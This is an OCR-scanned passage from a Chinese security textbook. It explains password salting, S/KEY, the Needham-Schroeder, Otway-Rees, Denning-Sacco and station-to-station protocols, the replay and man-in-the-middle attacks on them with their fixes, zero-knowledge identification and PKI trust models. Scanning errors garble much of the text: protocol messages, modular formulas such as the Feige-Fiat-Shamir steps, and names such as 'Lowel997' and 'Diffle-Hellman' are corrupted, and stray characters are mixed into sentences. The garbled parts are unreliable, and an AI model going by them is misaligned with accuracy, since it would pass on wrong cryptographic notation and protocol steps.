再 用 单 向 函数 对 其 运算 。 然 后 将 Salt 值 和 单 向 函数 运算 的 结果 存 人 主机 中 。Salt 只 防止 
对 整个 口令 文件 采用 的 字典 攻击 ,不 能 防止 对 单个 口令 的 字典 攻击 。 

3. SKEY 

Alice 输入 随机 数 R, 计 算 机 计算 xı =FR) xe — foa rtt Xn fO. Alice 保管 xi ， 
XX ett Xa 这 些 数 的 列表 ,计算 机 在 登录 数据 库 中 Alice 的 名 字 后 面 存储 xar HIE o 

当 Alice 第 一 次 登录 时 ,输入 名 字 和 x, ,计算 机 计算 f(xs), 并 把 它 和 x+ 比较 ,如 果 匹 配 ， 
就 证 明 Alice 身份 是 真实 的 。 然 后 ,计算 机 用 x 代替 xao Alice 将 从 自己 的 列表 中 取消 xa o 

Alice 每 次 登录 时 ,都 输入 它 的 列表 中 未 取消 的 最 后 的 数 xi, 计 算 机 计算 {f(x1) ,并 和 存 
储 在 它 的 数据 库 中 的 xn 比较 。 当 Alice 用 完了 列表 上 面 的 数 后 ,需要 重新 初始 化 。 

为 了 增强 基于 口令 认证 的 安全 ,可 以 采用 以 下 改进 方案 。 

CD 认证 过 程 有 一 定 的 时 延 , 增 大 穷 举 尝试 的 难度 。 

(2) 不 可 预测 的 口令 。 修 改口 令 登 记 程序 以 便 促使 用 户 使 用 更 加 生僻 的 口令 。 这 样 就 
进一步 削弱 了 字典 攻击 。 

CD 对 无 效用 户 名 的 回答 应 该 与 对 有 效用 户 名 的 回答 相同 。 

成 功 地 注册 进入 系统 ,必须 首先 输入 一 个 有 效 的 用 户 名 ,然后 再 输入 一 个 对 该 用 户 名 是 
正确 的 口令 。 如 果 当 用 户 名 有 效 时 ,要 延迟 1. 5s 后 才 回 答 ,而 对 无 效用 户 名 是 立即 回答 。 
这 样 破坏 者 就 能 查 明 某 个 特定 的 用 户 名 是 否 有 效 。 

(4) 一 次 性 口令 

固定 密码 有 被 监听 及 猜 中 的 问题 :如 果 使 用 者 使 用 的 密码 可 以 不 断 改 变 就 可 以 防止 固 
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定 密码 的 问题 ,因此 这 种 不 断 改变 使 用 者 密码 的 技术 称 为 动态 口令 (Dynamic Password) 或 
一 次 性 口令 OTP (One-time Password) 。 其 主要 思路 是 在 登录 过 程 中 加 入 不 确定 因素 ,使 
每 次 登录 过 程 中 传送 的 信息 都 不 相同 ,以 提高 登录 过 程 的 安全 性 。 系 统 接收 到 登录 口令 后 
做 一 个 验算 即 可 验证 用 户 的 合法 性 ,如 挑战 /响应 认证 。 用 户 登 录 时 ,系统 产生 一 个 随机 数 
(Nonce) 发 送 给 用 户 。 用 户 将 自己 的 口令 和 随机 数 用 某 种 单 向 算法 混合 起 来 发 送 给 系统 ， 
系统 用 同样 的 方法 做 验算 即 可 验证 用 户 身份 。 


3.7.2 基于 对 称 密码 的 认证 


下 面 是 1978 年 出 现 的 著名 的 Needham-Schroeder 认证 协议 。 
这 里 需 建立 一 个 称 为 鉴别 服务 器 的 可 信 权 威 机 构 ( 密 钥 分 发 中 心 KDC) ,拥有 每 个 用 户 


的 秘密 密 钥 。 若 用 户 A 和 欲 与 用 户 B 通信 , 则 用 户 A 向 鉴别 
KDE 服务 器 申请 会 话 密 钥 。 在 会 话 密 钥 的 分 配 过 程 中 ,双方 身份 
e 得 以 鉴别 ,如 图 3. 19 所 示 。 
Em 21 unas 
— A: E&[Ra || B || Ks || EmLKs || A J] 
图 3. 19 Needham-Schroeder © A > B: EnLKs||A]J 
认证 过 程 Q B — A; E&[Rb ] 


© A — B: E&[Rb—1] 

其 中 : KDC 是 密 钥 分 发 中 心 ; Ra、Rb 是 一 次 性 随机 数 ; 保密 密 钥 Ka 和 Kb 分 别 是 A 
fil KDC,B 和 KDC 之 间 共 享 的 密 钥 ; Ks 是 由 KDC 分 发 的 A 5j B 的 会 话 密 钥 ; Ex 表示 使 
用 密 钥 X 加 密 。 

Needham-Schroeder 认证 协议 使 用 了 多 次 挑战 /响应 认证 协议 。 

d) A 告诉 KDC.A 想 与 BB 通信, 明文 消息 中 包含 一 个 大 的 随机 数 Ra. 

(2) KDC 发 送 一 个 使 用 A 和 KDC 之 间 共 享 的 密 钥 Ka 加 密 的 消息 ,消息 包括 由 KDC 
分 发 的 A 与 B 的 会 话 密 钥 Ks. A 的 随机 数 Ra、B 的 名 字 、 一 个 只 有 B 能 看 懂 的 许可 证 。A 
的 随机 数 Ra 保证 了 该 消息 是 新 的 而 不 是 攻击 者 重 放 的 ,B 的 名 字 保 证 了 第 一 条 明文 消息 中 
的 B 未 被 更 改 ,许可 证 ErsLKs || A MEH BA KDC 之 间 共 享 的 密 钥 Kb 加 密 。 

G) A 将 许可 证 EeeLKs || Aj 发 给 B. 

(4) B 解 密 许 可 证 Eg [Ks | | AJ 获得 会 话 密 钥 Ks, 然 后 产生 随机 数 Rb,B 向 A 发 送 消 
息 Ex [Rb]. 

CO A 向 B 发 送 消息 Ex.[ Rb. — 1 1E IEBH E CIE RU A 5 Balb fr. 

以 上 完成 了 双向 认证 ,并 同时 实现 了 秘密 通信 。 

假定 攻击 者 已 经 掌握 A 和 B 之 间 通 信 的 一 个 旧 的 会 话 密 钥 (如 经 过 蛮 力 攻击 等 ), 则 入 
侵 者 I 可 以 在 第 (3) 步 冒充 A 利用 旧 的 会 话 密 钥 欺骗 B. RIE B 记 住所 有 以 前 使 用 的 与 A 
通信 的 会 话 密 钥 ,否则 B 无 法 判断 这 是 一 个 重 放 攻击 。 

i3 ICA) > B: EeeLKs || A] 

i4 B — ICA); Eg [Rb ] 

i5 ICA) — B: E&[Rb—1] 

这 里 I(A) 表 示 IRA A, Needham 和 Schroeder 于 1987 年 发 表 了 一 个 协议 修正 了 这 


个 漏洞 。Denning-Sacco 协议 使 用 时 间 戳 修正 这 个 漏洞 。 下 面 介 绍 Gavin Lowel997 年 给 
出 的 基于 Denning-Sacco 协议 的 改进 版 本 : 

O A > KDC: A|| B 

© KDC > A: E&[B || Ks || T || Ex[Ks || All TI] 

© A > B: EøLKs || A || T] 

@® B > A: E«(Rb ] 

© A — B: E&[Rb—1] 

其 中 表示 时 间 鹤 ,TT 记录 了 KDC 发 送 消 息 @ 时 的 时 间 ; A, B AHE Te] CHO E H4 E 
的 “新 鲜 性 ”, 从 而 避免 了 重 放 攻 击 。 

Otway-Rees 认证 协议 

Otway-Rees 认证 协议 也 是 基于 对 称 密码 , 它 只 含 4 条 消息 ,如 图 3. 20 所 示 。 

DA—>B:A|I|IBI| RI| EsLAIIBIIR |IRa] 

© B > KDC: RII A || BII EsLAIIBII RIIRa]|| EnLAIIBIIRIIRb] 

© KDC > B: R || E&CRb || Ks] || Ex [Ra || Ks] 

@® B > A: R || Ek [Ra || Ks] 

其 中 : 

d) A 产生 一 消息 ,包括 用 和 KDC 共享 的 密 钥 Ka 加 密 的 一 个 索引 号 RA 的 名 字 、B 
的 名 字 和 一 随机 数 Ra。 

(2) B 用 A 消息 中 的 加 密 部 分 构造 一 条 新 消息 。 包 括 用 和 KDC 共享 的 密 钥 Kb 加 密 
的 一 个 索引 号 RA 的 名 字 、B 的 名 字 和 一 新 随机 数 Rb. 

(3) KDC 检查 两 个 加 密 部 分 中 的 索引 号 R 是 否 相 
同 , 如 果 相 同 , 就 认为 从 也 来 的 消息 是 有 效 的 。KDC 产 
生 一 个 会 话 密 钥 Ks 用 Kb 和 Ka 分 别 加 密 后 传送 给 B. 
每 条 消息 都 包含 KDC 接收 到 的 随机 数 。 

(4) B 把 用 A 的 密 钥 加 密 的 消息 连同 索引 号 R 一 起 。 图 3.20 Otway-Rees 认证 过 程 
传 给 A。 


3.7.3 基于 分 铀 密码 的 认证 


首先 假定 双方 已 经 知道 对 方 的 公开 密 钥 ,如 交换 证 书 。 

ISO 认证 的 基本 步骤 如 下 : 

(D A — B; Ra 

© B — A: Cert, || Rb || Sb(Ra || Rb| |B) 

其 中 : Ra、Rb 是 大 的 随机 数 ; Cert, 是 B 的 证 书 ; Sb() 表 示 使 用 B 的 私有 密 钥 进行 数 
字 签 名 。 如 果 需 要 双向 认证 ,需要 第 三 步 : 

© A > B: Cert, ||Sa(Ra || Rb| |A) 

其 中 : Sa() 表 示 使 用 A 的 私有 密 钥 进行 数字 签名 。 

1978 年 出 现 的 Needham-Schroeder 公开 密码 协议 也 是 一 个 双向 认证 协议 : 

Q A > B: Eb(A || Ra) 

© B — A; Ea (Ra || Rb) 

© A > B: Eb (Rb) 
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这 里 Ex() 是 使 用 x 的 公开 密 钥 进行 加 密 。1995 年 ,Lowe 给 出 了 如 下 的 攻 

il A > E Ei(A || Ra) 

iil ICA) — B: Eb(A || Ra) 

ii2 B — ICA); Ea (Ra || Rb) 

i2I1— A; Ea(Ra || Rb) 

i3 A — I; Ei (Rb) 

ii3 ICA) > B: Eb (Rb) 

可 以 在 第 二 条 消息 中 增加 B 的 标识 阻止 这 种 攻击 。 

如 果 在 认证 的 基础 上 还 需要 建立 一 个 秘密 的 共享 会 话 密 钥 ,可 通过 多 种 不 同 的 方式 实 
现 ,以 下 是 一 个 典型 的 协议 : 

(D A — B; Ra 

© B —> A; Rb || Ea(Ks)||Sb(A||Ra || Rb|| Ea(Ks)) 

®© A — B: Sa(B| | Rb) 

这 里 Ex() 是 使 用 x 的 公开 密 钥 进行 加 密 。Sx() 是 使 用 x 的 私有 密 钥 进行 数字 签名 。 

3.7.3.1 协议 执行 过 程 

协议 执行 过 程 是 : 

首先 A 发 送 给 B 一 个 一 次 性 随机 数 

到 B 收 到 A 发 送 的 消息 后 ,B 选择 一 个 会 话 密 钥 Ks, 随 后 用 A 的 公开 密 钥 加 密 ,连同 
数字 签名 一 并 发 送 给 A。 

当 A 收 到 第 二 条 消息 后 ,用 自己 的 私有 密 钥 解密 还 得 到 会 话 密 钥 Ks, 并 用 B 的 公开 密 
钥 验 证 数字 签名 ,随后 A 发 送 使 用 私有 密 钥 数 字 签 名 的 随机 数 Rb, 当 B 收 到 该 消息 后 ,他 
知道 A 收 到 了 第 二 条 消息 ,并 且 只 有 A 能 够 发 出 第 三 条 消息 。 

现在 假定 双方 不 知道 对 方 的 公开 密 钥 。 这 时 需要 一 个 可 信 的 第 三 方 工 保存 公开 密 钥 
库 。Denning-Sacco 认证 协议 如 下 : 

OA 一 T:AlIIB 

Q T— A: SB I Ks)|| Sr(A I] KA) 

工 把 用 工 的 私 钥 工 签名 的 也 的 公 钥 Ks 发 给 A。 工 也 把 用 工 的 私 钥 了 签名 的 A 的 公 
钥 Ka 发 给 A。 

© A — B: Es(SA(K || TA))|| Sr(B,Ka)|| SrCA,KA) 

A 向 B 传 送 随机 会 话 密 钥 K TRI bid TA( 都 用 A 自己 私 钥 签名 并 用 B 的 公 钥 加 密 ) 
和 两 个 签名 的 公开 密 钥 。 

B 用 私 钥 解 密 A 的 消息 ,然后 用 A 的 公 钥 验证 签名 。 以 确信 时 间 标 记 仍 有 效 。 在 这 里 
A 和 了 都 有 公开 密 钥 K, 这 样 就 能 够 安全 地 通信 。 

但 该 协议 是 有 缺陷 的 。 在 和 A 一 起 完成 协议 后 ,B 能 够 伪装 成 A。 其 步骤 是 : 

(D B- T; B||C 

Q T > B: &K(CC|IKO || SCGB || Ks) 

Q BCA) — C: ECGA(K || Ta))|| SCC || Ke)|| SCA || Ka) 

B 将 以 前 从 A 那 里 接收 的 会 话 密 钥 和 时 间 标 记 的 签名 用 C 的 公 钥 加 密 , 并 和 人 A 和 C 的 
证 书 一 起 发 给 C。C 用 私 钥 解密 A 的 消息 ,然后 用 A 的 公 钥 验证 签名 。 检 查 并 确信 时 间 标 


^ 
RB 


记 仍 有 效 。C 现在 认为 正在 与 A 交谈 ,B 成 功 地 欺骗 了 C。 在 时 间 标 记 截止 前 ,B 可 以 欺骗 
任何 人 。 

针对 上 述 问题 容易 解决 ,可 以 在 第 回 步 的 加 密 消 息 内 加 上 名 字 : 

Es(SAAIIBII KI|| TA))I| SCA || Ka)|| SG || Ka) 

因为 这 一 步 清楚 地 表明 是 A 和 也 在 通信 ， 所 以 现在 B 就 不 可 能 对 C 重 放 旧 消息 。 

Diffie-Hellman 算法 发 明 于 1976 年 ,是 第 一 个 公开 密 钥 算法 。Diffie-Hellman 算法 不 
能 用 于 加 密 与 解密 ,但 可 用 于 密 钥 分 配 。 密 钥 交换 协议 (Key Exchange Protocol) 是 指 两 人 
或 多 人 之 间 通 过 一 个 协议 取得 密 钥 并 用 于 通信 加 密 。 在 实际 的 密码 应 用 中 密 钥 交 换 是 很 重 
要 的 一 个 环节 。 比 如 说 利用 对 称 加 密 算法 进行 秘密 通信 ,双方 首先 需要 建立 一 个 共享 密 钥 。 
如 果 双 方 没有 约定 好 密 钥 ,就 必须 进行 密 钥 交换 。 如 何 使 得 密 钥 到 达 接 收 者 和 发 送 者 手 里 
是 件 很 复杂 的 事情 ,最 早 利用 公 钥 密码 思想 提出 一 种 允许 陌生 人 建立 共享 秘密 密 钥 的 协议 
称 为 Diffle-Hellman 密 钥 交 换 。 

Diffie-Hellman 密 钥 交换 算法 是 基于 有 限 域 中 计算 离散 对 数 的 困难 性 问题 之 上 的 。 离 
散 对 数 问题 是 指 对 任意 正 整 数 x, 计 算 g* mod P 是 容易 的 ; 但 是 一 般 的 已 知 g、Y APSR x, 
使 Y= g* mod P 是 计算 上 几乎 不 可 能 的 。 

3.7.3.2 ”建立 共享 密 钥 

当 Alice 和 Bob 要 进行 秘密 通信 时 ,他 们 可 以 按 如 下 步骤 建立 共享 密 钥 : 

Alice 选取 大 的 随机 数 x, 并 计算 X==g*(mod P). Alice 将 g.P、X 传送 给 Bob, 

Bob 选取 大 的 随机 数 y, 并 计算 Y = gr(mod P) ,Bob 454. Y 传送 给 Alice, 

Alice 计 算 K=Y*(mod P); Bob il $€ K' — X’ (mod P), 易 见 ,K=K' —g? (mod P), 
Alice 和 Bob 获得 了 相同 的 秘密 值 K。 双 方 以 K 作为 加 解密 钥 以 对 称 密 钥 算 法 进行 保密 
通信 。 

监听 者 可 以 获得 g、P、X、Y, 但 由 于 算 不 出 xy, 所 以 得 不 到 共享 密 钥 K。 

虽然 Diffie-Hellman 密 钥 交换 算法 十 分 巧妙 ,但 由 于 没有 认证 功能 ,存在 中 间 人 攻击 。 
当 Alice 和 Bob 交换 数据 时 ,Trudy 拦截 通信 信息 ,并 冒充 Alice 欺骗 Bob. H 7E Bob 欺骗 
Alice。 其 过 程 如 图 3.21 Bros: 

(D Alice 选取 大 的 随机 数 x, 并 计算 X=g*(mod P), Alice 将 g.P、X 传送 给 Bob, 但 被 
Trudy 拦截 。 

@ Trudy 冒充 Alice 选取 大 的 随机 数 z, 并 计算 Z = g' (mod P). Trudy 将 Z 传送 
给 Bob。 

G Trudy 冒充 Bob 选取 大 的 随机 数 z, 并 计算 Z = g' (mod P). Trudy 将 Z 传 送 给 
Alice, 

@ Bob 选取 大 的 随机 数 y, 并 计算 Y=g (mod P). Bob 将 Y 传送 给 Alice, 但 被 Trudy 拦截 。 


© 


Alice Trudy Bob 


图 3.21 中 间 人 攻击 过 程 
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HOD. G Alice 与 Trudy 共享 了 一 个 秘密 密 钥 g ,由 四、@Trudy 与 Bob 共享 了 一 个 秘 
密 密 钥 g” 。 

站 间 协 议 (Station-to-Station Protocol) 是 一 个 密 钥 协商 协议 , 它 能 够 挫败 这 种 中 间 人 攻 
击 , 其 方法 是 让 A、B 分 别 对 消息 签名 。 

DA-B:g 

© B > A: g|| E.b(gl| g» 

© A > B: ECGa(g'll g» 

其 中 建立 的 会 话 密 钥 是 k=g* 。 站 间 协 议 的 一 个 改进 版 本 没有 使 用 加 密 , 建 立 的 会 话 
密 钥 仍然 是 k=g”. 

DA-B: g“ 

Q B > A: g'|| Sb(g’|| g*) 

Q A — B: Sa(g*|l| g) 

站 间 协 议 具有 前 向 保密 性 (Forward Secret) 。 前 向 保密 性 是 指 长 期 密 钥 被 攻破 后 , 利 
用 长 期 密 钥 建 立 的 会 话 密 钥 仍 具有 保密 性 。 站 间 协 议 中 A、B 的 私 钥 泄露 不 影响 会 话 密 钥 
的 安全 。 


3.7.4 零 知 识 身份 认证 


零 知 识 证 明 (Zero-knowledge Proof) 的 思想 是 : 证 明 者 Peggy 拥有 某 些 知识 (如 某 些 长 期 
没有 解决 的 难 问题 的 解决 方法 ), 零 知识 证 明 就 是 在 不 将 该 知识 的 内 容 汇 露 给 验证 者 Victor 的 
前 提 下 ,Peggy 向 Victor 证 明 自 己 拥有 该 知识 。 下 面 Peggy 和 Victor 之 间 的 一 段 对话 : 

Peggy:“ 我 可 以 对 密 文 为 C 的 消息 进行 解密 。” 

Victor:“ 我 不 相信 。 请 证 明 。” 

Peggy( 糟 糕 的 回答 ):“ 密 钥 是 K, 您 可 以 看 到 消息 解密 成 了 M。” 

Victor: “IAIA! 现在 我 也 知道 了 密 钥 和 消息 。” 

这 里 ,Peggy 虽然 证 明了 自己 拥有 某 些 知识 ( 密 钥 K 及 明文 ND , 却 向 Victor 泄露 了 这 
些 知识 。 一 个 更 好 的 对 话 是 : 

Peggy:“ 我 可 以 对 加 密 为 C 的 消息 进行 解密 。” 

Victor:“ 我 不 相信 。 请 证 明 。” 

Peggy( 好 的 回答 ):“ 让 我 们 使 用 一 个 零 知 识 协议 ,我 将 以 任意 高 的 概率 证 明 我 的 知识 
(但 是 不 会 将 关于 消息 的 任何 情况 泄露 给 您 )。” 

Victor:“ 好 。” 

Peggy 和 Victor 通过 该 协议 …… 

可 以 使 用 洞穴 例子 来 解释 零 知 识 ,C 和 了 D 之 间 
存在 一 个 密 门 ,并 且 只 有 知道 咒语 的 人 才能 打开 。 
Peggy 知道 咒语 并 想 对 Victor 证 明 , 但 证 明 过 程 中 
不 想 泄露 咒语 。 零 知识 洞穴 如 图 3. 22 所 示 。 

步骤 如 下 : 

(D) Victor 站 在 人 A 点 ; 

图 3.22 零 知识 洞穴 (2) Peggy 一 直 走 进 洞穴 ,到 达 C 点 或 者 D 点 


(3) 在 Peggy 消失 在 洞穴 中 之 后 ,Victor 走 到 BB 点 ; 

(4) Victor 随机 选择 左 通道 或 者 右 通 道 , 要 求 Peggy 从 该 通道 出 来 ; 

(5) Peggy 从 Victor 要 求 的 通道 出 来 ,如 果 有 必要 就 用 吕 语 打开 密 门 ; 

(6) Peggy fil Victor 重复 步骤 (1) 至 (5)n 次。 

如 果 Peggy 不 知道 这 个 咒语 ,那么 只 能 从 进去 的 路 出 来 ,如 果 在 协议 的 每 一 轮 中 Peggy 
都 能 按 Victor 要 求 的 通道 出 来 ,那么 Peggy 所 有 n 次 都 猜 中 的 概率 是 1/2"。 经 过 16 轮 后 ， 
Peggy 只 有 1/65 536 的 机 会 猜 中 。 于 是 Victor 可 以 假定 ,如 果 所 有 16 次 Peggy 的 证 明 都 
是 有 效 的 ,那么 他 一 定 知道 开启 C 点 和 D 点 间 的 密 门 的 咒语 。 

下 面 来 看 一 个 零 知 识 证 明 的 例子 。 

图 是 否 同 构 是 NP 完全 问题 ,对 于 一 个 非常 大 的 图 ,判断 两 个 图 是 否 同 构 是 非常 困难 
的 。 对 于 图 G 和 图 G; ,如 果 存 在 一 个 一 一 对 应 的 函数 F: 下 的 定义 域 是 Gi 的 顶点 集 ; F 
的 值 域 是 G. 的 顶点 集 。 当 且 仅 当 [g,g*] 是 G 中 的 一 条 边 ,[F(g1),F(gz)] 才 是 Gs 中 的 
一 条 边 , 称 Gi 和 G2 同 构 的 。 

假设 Peggy 知道 图 Gi 和 图 G: 之 间 同 构 ,Peggy 使 用 下 面 的 协议 将 使 Victor 相信 Gi 
和 Gs 同 构 

(1) Peggy 随机 置换 G 产生 另 一 个 图 H. JE H 和 Gi 同 构 。 因 为 Peggy 知道 G 和 
H 同 构 ,也 就 知道 了 H 和 G 同 构 。 

(2) Peggy 把 H 送 给 Victor, 

(3) 对 如 下 两 个 问题 Victor 选择 其 中 的 一 个 ,要 求 Peggy 证 明 。 但 是 ,Victor 不 要 求 两 
者 都 证 明 , 即 证 明 G, 和 H 同 构 ,或 者 证 明 Go 和 H 同 构 。 

(4) Peggy 按 Victor 的 要 求证 明 。 

(5) Peggy 和 Victor 重复 步骤 (1) 至 (4)n 次 。 

如 果 Peggy 不 知道 G 和 Ge 之 间 的 同 构 性 ,Peggy 就 只 能 创造 一 个 图 或 者 与 G1 同 构 
或 者 与 G 同 构 。 每 一 轮 中 Peggy 只 有 50% 的 机 会 猿 中 Victor 的 选择 。 又 因为 Peggy 在 
协议 的 每 一 轮 都 产生 一 个 新 图 也 , 故 不 管 经 过 多 少 轮 协议 Victor 也 得 不 到 任何 信息 ,他 不 
能 从 Peggy 的 答案 中 了 解 G 和 G 的 同 构 性 。 图 同 构 的 零 知识 证 明 只 具有 理论 意义 ,从 实 
现 来 看 ,是 不 实用 的 。 

这 里 介绍 著名 的 Feige-Fiat-shamir 零 知 识 身份 认证 协议 的 一 个 简化 方案 。 

可 信赖 仲裁 选 定 一 个 随机 模 数 n,n 为 两 个 大 素数 乘积 ,实际 中 至 少 为 512 位 或 长 达 
1024 位 。 仲 裁 方 产生 随机 数 v.f x’ =v mod n. BI v 2g BE n 的 平方 剩余 , 且 有 v :mod n f£ 
在 。 以 v 作 为 Peggy 的 公 钥 ,而 后 计算 最 小 的 整数 s: s=sqrt(v ') mod n 作为 Peggy 的 私 
钥 。 实 施 身 份 证 明 的 协议 如 下 : 

(D 用 户 Peggy 取 随 机 数 r, 这 里 r 二 m, 计 算 x= r mod m, 把 x 送 给 Victor; 

© Victor 把 一 个 随机 位 b 送 给 Peggy: 

© 若 b=0, 则 Peggy 将 r 送 给 Victor; 若 b=1, 则 Peggy 将 yrs 送 给 Victor; 

@ # b=0, M] Victor 验证 x— r? mod m, 从 而 证 实 Peggy 知道 sqrt(x); # b 1. Dll 
Victor 验证 x— y^. v mod m, 从 而 证 实 Peggy 知道 s; 

这 是 一 轮 鉴 定 ,Peggy 和 Victor 可 将 此 协议 重复 t 次 ,直到 Victor 相信 Peggy 知道 s 
为 止 。 
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3.8 PKI 及 数字 证 书 


3.8.1 PKI 概述 


数字 证 书 是 一 个 经 证 书 授权 中 心 数 字 签 名 的 包含 公开 密 钥 拥有 者 信息 和 公开 密 钥 的 文 
件 。 最 简单 的 证 书包 含 一 个 公开 密 钥 .名称 以 及 证 书 授权 中 心 的 数字 签名 。 一 般 情况 下 证 
书 中 还 包括 密 钥 的 有 效 时 间 ,发 证 机 关 ( 证 书 授权 中 心 ) 的 名 称 .该 证 书 的 序列 号 等 信息 ,证 
书 的 格式 遵循 ITUT X. 509 国际 标准 。 

PKI 是 一 个 用 公 钥 概念 和 技术 实施 和 提供 安全 服务 的 具有 普 适 性 的 安全 基础 设施 。 
PKI 是 一 种 新 的 安全 技术 , 它 由 公开 密 钥 密 码 技术 数字 证 书 、 证 书 发 放 机 构 (CA) 和 关于 公 
开 密 钥 的 安全 策略 等 基本 成 分 共同 组 成 的 。PKI 是 利用 公 钥 技术 实现 电子 商务 安全 的 一 
种 体系 ,是 一 种 基础 设施 ,网 络 通信 、 网 上 交易 是 利用 它 来 保证 安全 的 。 从 某 种 意义 上 讲 ， 
PKI 包含 了 安全 认证 系统 , 即 安全 认证 系统 CA 是 PKI 不 可 缺 的 组 成 部 分 。PKI 公 钥 基础 
设施 是 提供 公 钥 加 密 和 数字 签名 服务 的 系统 或 平台 ,目的 是 为 了 管理 密 钥 和 证 书 。 一 个 机 
构 通 过 采用 PKI 框架 管理 密 钥 和 证 书 可 以 建立 一 个 安全 的 网 络 环境 。PKI 主要 包括 4 个 
部 分 : X. 509 格式 的 证 书 (X. 509 V3) 和 证 书 废止 列表 CRL(X. 509 V2); CA 操作 协议 ; 
CA 管理 协议 ; CA 政策 制定 。 

在 传统 法 律 环境 下 ,手写 署名 和 印章 的 方式 的 签名 已 成 为 大 多 数 社会 活动 的 法 定 要 件 。 

由 于 科学 技术 的 发 展 ,信息 网 络 应 运 而 生 , 人 们 传递 信息 的 意思 表示 发 展 出 了 电子 形 
式 , 与 之 相 适 应 ,为 了 解决 网 络 环境 下 交易 当事人 身份 确认 问题 ,于 是 人 们 从 技术 上 发 展 出 
了 多 种 手段 ,如 计算 机 口令 .数字 签名 .生物 技术 (指纹 、 掌 纹 、. 视 网 膜 纹 . 脑 电波 .声波 .DNA 
等 ) 签 名 等 。 上 述 这 些 手 段 ,统称 为 电子 签名 。 

电子 签名 有 多 种 方式 ,数字 签名 是 其 中 的 一 种 ,是 指 采 用 非 对 称 密 钥 加 密 技术 制 成 的 电 
子 签名 。 这 种 技术 已 经 比较 成 熟 ,目前 国内 外 电子 签名 中 正在 广泛 使 用 。 


3.8.2 PKI4& 4 


1. 信任 模式 

在 ITU-T 推荐 标准 X. 509 规范 中 给 出 了 信任 定义 : 实体 A 认定 实体 也 将 严格 地 按 A 
所 期 望 的 那样 行动 , 则 A 信任 B。 这 里 称 A 是 信任 者 ,B 是 被 信任 者 。 从 定义 可 以 看 出 , 信 
任 涉及 对 某 种 事件 .情况 的 预测 .期 望 和 行为 。 信 任 是 信任 者 对 被 信任 者 的 一 种 态度 ,是 对 
被 信任 者 的 一 种 预期 ,相信 被 信任 者 的 行为 能 够 符合 自己 的 愿望 。 

按照 有 无 第 三 方 可 信 机 构 参 与 ,信任 可 划分 为 第 三 方 信任 和 直接 信任 。 
PEN Q@ 第 三 方 信任 


信任 信任 第 三 方 信任 是 指 两 个 实体 以 前 没有 建立 起 信任 关 
系 ,但 双方 与 共同 的 第 三 方 有 信任 关系 ,第 三 方 为 两 者 
第 三 方 信任 


Ai 狂人 e |] 的 可 信任 性 进行 了 担保 ,由 此 建立 起 来 的 信任 关系 。 
" 第 三 方 信任 的 实质 是 第 三 方 的 推荐 信任 ,是 目前 网 络 
图 3.23 第 三 方 的 推荐 信任 安全 中 普遍 采用 的 信任 模式 ,如 图 3.23 所 示 。 


第 三 方 的 认证 代理 就 是 称谓 的 “认证 中 心 *(CA) 。 一 个 认证 中 心 是 一 个 可 信任 的 实体 ， 
通常 是 国家 认定 的 权威 机 构 , 它 的 核心 职责 就 是 审查 认证 某 实体 的 身份 ,证 明 该 实体 是 不 是 
他 所 声称 的 实体 ,然后 由 CA 发 放 给 实体 数字 证 书 , 作 为 CA 信任 他 的 一 种 证 明 ,这 样 ,通过 
第 三 方 信任 ,任何 信任 第 三 方 的 人 便 可 以 信任 这 个 实体 。 

证 书 将 用 户 公 钥 和 名 字 等 其 他 信息 绑 定 起 来 ,CA 使 用 它 的 签名 私 钥 对 证 书信 息 进行 
数字 签名 。CA 机 构 的 数字 签名 使 得 攻击 者 不 能 伪造 和 自 改 证 书 ,CA 的 数字 签名 对 证 书 提 
供 了 安全 和 信任 的 两 个 元 素 : 第 一 ,证 书 上 的 有 效 的 数字 签名 是 证 书 完整 性 的 保证 ; 第 二 ， 
由 于 CA 是 唯一 有 权 使 用 它 的 签名 私 钥 的 实体 ,保证 了 只 有 CA 能 做 那样 的 签名 ,CA 不 能 
否认 它 签名 的 证 书 ( 抗 抵赖 性 ) 。 

如 果 两 个 CA 交换 密 钥 信息 ,这样 每 个 CA 都 可 以 有 效 地 验证 另 一 方 CA 密 钥 的 可 信 
任性 , 称 这 样 的 过 程 为 交叉 认证 。 交 叉 认证 是 第 三 方 信任 的 扩展 , 即 一 个 CA 的 用 户 信任 其 
他 所 有 自己 CA 交叉 认证 的 CA 用 户 ,如 图 3.24 所 示 。 
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图 3.24 扩展 的 第 三 方 信任 模型 


在 第 三 方 信任 中 ,也 可 由 普通 用 户 通 过 担当 CA 并 使 其 公 钥 被 其 他 人 所 认证 来 建立 自 
己 的 信任 网 络 。 一 个 典型 的 例子 是 : 在 PGP 中 当 用 户 签署 男 一 个 人 的 密 钥 时 ,他 就 成 为 了 
这 个 密 钥 的 介绍 人 。 当 这 个 过 程 进行 下 去 ,就 建立 了 一 个 信任 网 络 。 例 如 ,A 收 到 一 个 据 
称 属于 B 的 证 书 , 这 个 证 书 是 由 A 不 认识 的 C 签署 的 ,但 是 C 的 证 书 是 由 A 认识 并 且 信 任 
的 D 签 署 的 。 在 这 种 情况 下 ,A 可 以 决定 信任 B 的 密 钥 ( 即 信任 从 D 到 C 再 到 D 的 密 钥 
链 ) ,也 可 以 决定 不 信任 也 的 密 钥 (认为 "未知 的 ”B 与 “已 知 的 "D 之 间 的 距离 太 远 )。 这 种 模 
型 一 般 不 适合 用 在 贸易 、 金 融 或 政府 环境 中 ,因为 在 这 些 环境 下 ,通常 希望 或 需要 对 用 户 的 
信任 实行 某 种 控制 。 

在 可 信任 的 第 三 方 ( 公 证 人 ) 的 概念 之 上 也 可 建立 公证 机 制 , 以 确保 在 两 个 实体 间 交 换 
的 信息 的 某 些 性 质 不 致 变化 ,例如 , 它 的 来 源 、 完 整 性 ,或 它 被 发 出 或 收 到 的 时 间 。 

@ 直接 信任 

直接 信任 是 最 简单 的 信任 形式 。 两 个 实体 之 间 无 须 第 三 方 介绍 而 直接 建立 起 来 的 信任 
关系 称 为 直接 信任 。 

在 Web 浏览 器 中 ,用 户 都 直接 信任 根 CA 密 钥 ,因为 密 钥 是 由 制造 商 直 接 提供 的 ; 在 
安全 软件 (Pretty Good Privacy,PGP) 中 ,凡是 用 户 自己 验证 密 钥 , 从 不 设置 其 他 可 信和 介绍 
人 ,这 就 是 直接 信任 ; 当 两 个 从 不 同 的 CA 来 的 实体 要 进行 安全 通信 ,而 这 两 个 CA 之 间 不 
能 交叉 认证 时 ,这 时 也 需要 直接 信任 ,直接 信任 要 求 用 户 必须 在 物理 世界 中 已 经 存在 相互 信 
任 关系 ,在 个 人 的 基础 上 直接 交换 密 钥 信息 ,建立 起 信任 关系 。 如 果 没 有 个 人 之 间 的 信任 ， 
